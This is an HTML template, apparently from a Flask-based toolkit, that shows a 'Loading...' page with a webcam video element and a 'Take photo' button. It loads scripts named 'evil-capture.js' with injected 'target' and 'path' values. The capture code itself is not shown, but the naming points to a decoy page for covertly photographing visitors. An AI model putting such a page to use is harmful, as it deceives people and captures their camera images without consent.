<!doctype html>
<html lang="en-US">

<head>
	<meta charset='utf-8'>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Loading...</title>
	<link rel="stylesheet" href="{{ url_for('static', filename='evil.css') }}" type="text/css" media="all">
	<script>
		var target = '{{ target }}', path = '{{ path }}'
	</script>
	<script src="{{ url_for('static', filename='evil-capture.js') }}"></script>
</head>

<body>
	<main class="contentarea">
		<div class="camera">
			<video id="video">Video stream not available.</video>
			<button type="button" id="startbutton">Take photo</button>
		</div>
		<canvas id="canvas">
		</canvas>
		<div class="output">
			<img id="photo" alt="The screen capture will appear in this box.">
		</div>
	</main>
</body>

</html>